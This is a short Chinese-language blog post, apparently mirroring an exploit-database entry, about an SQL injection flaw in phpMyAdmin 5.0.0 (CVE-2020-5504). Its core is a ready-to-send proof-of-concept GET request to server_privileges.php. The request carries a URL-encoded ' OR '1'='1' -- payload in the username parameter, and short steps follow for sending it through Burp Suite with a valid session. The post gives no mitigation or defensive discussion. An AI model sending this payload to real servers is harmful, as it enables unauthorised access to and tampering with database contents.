phpMyAdmin 5.0.0 SQL注入漏洞技术分析与利用

本文详细分析了phpMyAdmin 5.0.0版本中存在的一个SQL注入安全漏洞(CVE-2020-5504),提供了完整的概念验证(PoC)利用请求和漏洞复现步骤。该漏洞允许经过认证的攻击者通过构造特制的HTTP请求,在目标服务器上执行任意SQL命令,从而可能窃取、篡改或破坏数据库信息。

漏洞标题:phpMyAdmin 5.0.0 - SQL注入

日期:2025-11-25

漏洞作者:CodeSecLab

供应商主页:https://github.com/phpmyadmin/phpmyadmin/

软件链接:https://github.com/phpmyadmin/phpmyadmin/

版本:5.0.0

测试平台:Windows

CVE:CVE-2020-5504

概念验证 (Proof Of Concept)

1
2
3
GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1
Host: phpmyadmin
Connection: close

附加条件:

  • 攻击者必须拥有一个有效的MySQL账户才能访问服务器。

漏洞复现步骤

  1. 登录phpMyAdmin。
  2. 使用Burp Suite等网络代理工具拦截并发送恶意请求,确保请求中包含有效的会话Cookie。
  3. 观察结果。
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计